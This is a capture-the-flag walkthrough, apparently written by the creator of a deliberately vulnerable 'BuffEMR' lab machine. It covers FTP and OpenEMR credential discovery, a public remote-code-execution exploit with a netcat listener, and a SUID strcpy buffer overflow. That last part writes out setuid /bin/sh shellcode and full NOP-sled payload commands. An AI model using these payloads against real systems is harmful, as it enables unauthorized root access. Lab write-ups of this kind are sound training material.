BuffEMR Walkthrough
This is a walk through of “BuffEMR” machine created by myself and is available here for hacking: BuffEmr.
This machines have been purposefully created for practicing penetration testing skills. I have been getting a lot of twitter DMs for hint and helps to PAWN this machine, so I decided to release the walkthrough !
Firstly, we will start with Nmap:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-25 09:44 EDT
Nmap scan report for 10.0.0.63
Host is up (0.0085s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 0 0 4096 Jun 21 14:21 share
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.0.0.154
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 92:4c:ae:7b:01:fe:84:f9:5e:f7:f0:da:91:e4:7a:cf (RSA)
| 256 95:97:eb:ea:5c:f8:26:94:3c:a7:b6:b4:76:c3:27:9c (ECDSA)
|_ 256 cb:1c:d9:56:4f:7a:c0:01:25:cd:98:f6:4e:23:2e:77 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
As we can see, there are three ports open (http, ftp, ssh).
We will check the webapp first:
It is running openEMR, If you try some default credentials, it won’t work!
For now, we will login into FTP as we can use anonymous login:
The FTP share contains source code for openemr, let’s try and find out any interesting information’s here by searching for sensitive information (eg: grep -ri password . or grep -ri key .)
The first thing I found was a pdfkey for something:
The second interesting thing I found was a file under /tests that contains admin creds:
Now let’s try and use this on openemr:
Now we have access, and we know the version, we can look for exploits in exploitDB.
After looking for exploits, I found multiple vulnerabilities for this version of OpenEMR including remote code execution.
Reference: Exploit
Run the python file with a netcat listening on port 1337:
Now we have access to the box:
We don’t have access to user folder, but we do have access to /var where I found a password protected zip file:
Now I am going to transfer the file to my local machine and use the pdfkey found earlier to see what is in it:
The zip file contains the password which can be used to ssh as buffemr:
The first thing I do to escalate privilege is to see the current user AKA.BuffEMR have the rights to run anything as sudo, which in this case we does not have:
Now after some enumeration, I found an executable owned by root (suid bit set) in the /opt directory:
I ran strings command on the binary and found out that there is a function the binary use called “strcpy”. The strcpy() function does not specify the size of the destination array, so buffer overrun is often a risk.
Maybe, we will try to over flow the buffer to run a shell code to get root?
We will use gdb for this:
The hex of A is \x41, at 520 it overrides EIP and at 510 it doesn’t override EIP, so we need to find the magic number that overrides EIP without going over, between 520 and 510:
After few tries, I found out that 516 is the magic number:
Now, we need a shell code:
Refer: shell-code-priv-esc
This is the shell code I am going to use:
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
Let’s find out the length of the shell code:
Our shell code is 55, we needed 516 A’s to override EIP, and 4 bytes is return address, so the buffer size will be 516-4 = 512
So, the plan is to use NOPs or no operations followed by shell code, to get a shell.
How many NOPs ?
512 – 55 = 457.
Note: NOP is \x90 in hex
So, we are going to run this:
python -c “print ‘\x90’ * 457 + ‘\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh’ + ‘\x41\x41\x41\x41’”
We don’t know the return address yet, so I am going to use 41 (A’s):
Now use the command to examine the memory:
x/300wx $esp
As we can see, the 0x90 is our NOP, so we can use any of the return address of the NOP to get our shell executed after:
Let’s run this:
run $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
After execution, we get a shell but inside gdb it still says we don’t have the elevated privilege, so exit out of gdb and run the same command :
Now we can access the root flag as we escalated our privilege :
This box require a person to utilize his/her web application exploitation skills, enumeration, and basic reverse engineering skills to gain foothold, and to abuse and then escalate privileges to root.